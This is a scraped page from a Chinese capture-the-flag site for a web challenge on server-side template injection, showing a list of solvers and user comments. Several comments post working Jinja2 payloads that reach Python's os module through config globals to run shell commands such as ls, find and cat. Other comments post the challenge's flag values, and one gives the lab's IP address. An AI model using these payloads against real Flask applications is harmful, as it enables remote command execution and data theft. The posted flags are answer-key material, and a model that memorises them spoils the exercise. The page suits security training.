Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16545
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
薄言. 攻破了该题 1天前
Zfc 攻破了该题 1天前
周文君 攻破了该题 2天前
杰哥 攻破了该题 3天前
zhaoguanjei 攻破了该题 4天前
tqlhg 攻破了该题 4天前
GrantFly 攻破了该题 6天前
yezhongyu 攻破了该题 6天前
heting 攻破了该题 6天前
y-123456 攻破了该题 7天前
271199@ 攻破了该题 8天前
dacming9527 攻破了该题 8天前
ggtom 攻破了该题 9天前
1586905095 攻破了该题 9天前
serena7780 攻破了该题 11天前
CTF-大王 攻破了该题 15天前
Ahri 攻破了该题 16天前
奥特曼 攻破了该题 16天前
SQZ 攻破了该题 17天前
评论
L.. 2年前
举报
SSTI模版注入:?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}},拓展?flag={{config.__class__.__init__.__globals__['os'].popen('cat../app/flag').read()}}
qiqiguren 2年前
举报
题解详细步骤:http://t.csdnimg.cn/yZlnn
18476760376 2年前
举报
好用,谢谢
是呆瓜蔚呀 2年前
举报
flag{f231bce175908e8fec554031a6232a55}
htttpss 2年前
举报
flag{c75b03620c73371a0e8f249354e0bd57} ?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}即可
3166235571 2年前
举报
是这个flag{561f38d2a44d42ca8847575a2e144b2b} so easy
2280443298 2年前
举报
{{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}
zhenbuhuiweb 2年前
举报
flag{d15e0ca95ddb50b992109b24c82cfe5a}
ssln 2年前
举报
114.67.175.224:12792/?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}} 看不懂,应该是什么固定格式,修改“ls”即可执行命令
210470qq 2年前
举报
flag{43b52fa732d6f8ccbfacea9e989ac07b}
songci 2年前
举报
ssti模板注入,尝试获取OS module进行命令执行或文件读取,使用init.globals来看看有没有os module或者其他的可以读写文件的,爆破获取300存在:{{"".__class__.__mro__[1].__subclasses__()[300].__init__.__globals__}},进行命令执行获取flag:?flag={{""